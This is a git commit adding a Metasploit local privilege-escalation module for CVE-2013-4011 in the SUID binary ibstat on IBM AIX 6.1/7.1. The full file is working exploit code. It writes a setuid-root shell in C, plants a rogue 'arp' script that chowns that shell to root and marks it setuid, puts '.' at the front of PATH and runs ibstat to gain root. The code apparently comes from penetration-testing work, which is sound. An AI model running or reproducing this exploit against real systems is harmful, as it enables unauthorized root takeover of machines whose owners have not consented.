Add AIX 6.1/7.1 ibstat $PATH Local Privilege Escalation

2014-02-27 23:54:44 +02:00 · 2014-02-27 23:54:44 +02:00 · fd4457fce8
parent 1a053909dc
commit fd4457fce8
1 changed files with 150 additions and 0 deletions
--- a/modules/exploits/aix/local/ibstat_path.rb
+++ b/modules/exploits/aix/local/ibstat_path.rb
@ -0,0 +1,150 @@
+# Not sure if the deps are correct
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit4 < Msf::Exploit::Local
+    Rank = ExcellentRanking
+
+    def initialize(info={})
+        super( update_info( info, {
+            'Name'          => 'ibstat $PATH Privilege Escalation',
+            'Description'   => %q{
+              This module exploits the trusted PATH environment variable of the SUID binary 'ibstat'.
+            },
+            'Author'         =>
+            [
+              'Kristian Erik Hermansen', #original author  
+              'Sagi Shahar (sagi-) <sagi.shahar[at]mwrinfosecurity.com>', #msf module 
+              'Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>', #msf module 
+            ],
+          'References'     =>
+            [
+              [ 'CVE', '2013-4011' ],
+              [ 'OSVDB', '95420' ],
+              [ 'BID', '61287' ],
+              [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827' ],
+              [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756' ]
+            ],
+            'Platform'      => [ 'aix' ],
+            'Arch'          => [ 'ppc' ],
+          'Targets'         =>
+            [
+              [
+                'IBM AIX Version 6.1',
+                {
+                  'Arch'     => 'ppc',
+                  'Platform' => 'aix',
+                  'AIX'      => '6.1',
+                }
+              ],
+
+              [
+                'IBM AIX Version 7.1',
+                {
+                  'Arch'     => 'ppc',
+                  'Platform' => 'aix',
+                  'AIX'      => '7.1',
+                }
+              ],
+
+            ],
+            'DefaultTarget' => 1,
+          }
+          ))
+         register_options([
+             OptString.new("WritableDir", [ true, "A directory where we can write files", "." ]),
+           ], self.class)
+  end
+
+    def exploit
+
+        if not is_vuln()
+            return
+        end
+
+        root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
+        arp_file = "#{datastore["WritableDir"]}/arp"
+
+        if (is_gcc_installed == true) 
+            write_c_file("#{root_file}")
+            print_status("Compiling source...")
+            cmd_exec "gcc -o #{root_file} #{root_file}" + ".c"
+            print_status("Compilation completed")
+            print_status("Deleting source...")
+            cmd_exec "rm #{root_file}.c"
+        else
+            cmd_exec "cp /bin/sh " + "#{root_file}"
+        end
+        print_status("Writing custom arp file...")
+        write_arp_file("#{arp_file}","#{root_file}")
+        print_status("Custom arp file written")
+        print_status("Updating PATH environment variable...")
+        cmd_exec 'PATH=.:$PATH'
+        cmd_exec 'export PATH'
+        print_status("Triggering vulnerablity...")
+        cmd_exec '/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null'
+        print_status("Removing custom arp...")
+        cmd_exec "rm #{arp_file}"
+        print_status("Checking root privileges...")
+        verify_root("#{root_file}")
+    end
+
+    def is_gcc_installed
+        print_status("Checking if gcc exists...")
+        gcc_version = cmd_exec 'gcc -v'
+        gcc_array = gcc_version.split("\n")
+        gcc_array.each do |res|
+            if res.include? ("gcc version")
+                print_good("gcc found! " + "(" + "#{res}" + ")")
+                return true
+            end
+        end
+        print_status("gcc not found. Using /bin/sh from local system")
+        return false;
+    end
+
+    def write_c_file(filename)
+        c_file = filename + ".c"
+        print_status("Dropping file " + c_file + "...")
+        cmd_exec "echo \"#include <stdio.h>\n\" > " + c_file
+        cmd_exec "echo \"int main()\" >> " + c_file 
+        cmd_exec "echo \"{\" >> " + c_file 
+        cmd_exec "echo \"setreuid(0,0);\" >> " + c_file 
+        cmd_exec "echo \"setregid(0,0);\" >> " + c_file
+        cmd_exec "echo \"execve(\\\"/bin/sh\\\",NULL,NULL);\" >> " + c_file 
+        cmd_exec "echo \"return 0;\" >> " + c_file 
+        cmd_exec "echo \"}\" >> " + c_file 
+    end
+
+    def write_arp_file(arp_file, bin_file)
+        cmd_exec "echo \"#!/bin/sh\" > " + arp_file
+        cmd_exec "echo \"chown root " + bin_file + "\" >> " + arp_file
+        cmd_exec "echo \"chmod 4555 " + bin_file + "\" >> " + arp_file
+        cmd_exec "chmod 0555 " + arp_file
+    end
+
+    def verify_root(filename)
+        cmd_exec filename
+        id_output = cmd_exec "id"
+        if id_output.include? ("euid=0(root)")
+            print_good("Got root! (euid)")
+        elsif id_output.include?("uid=0(root)")
+            print_good("Got root!")
+        else
+            print_status("Exploit failed")
+        end
+    end
+
+    def is_vuln()
+        ls_output = cmd_exec "ls -l /usr/sbin/ibstat"
+        if ls_output.include? ("-r-sr-xr-x")
+            print_good("Target is vulnerable")
+            return true
+        else
+            print_status("Target is not vulnerable")
+            return false
+        end
+    end
+end
+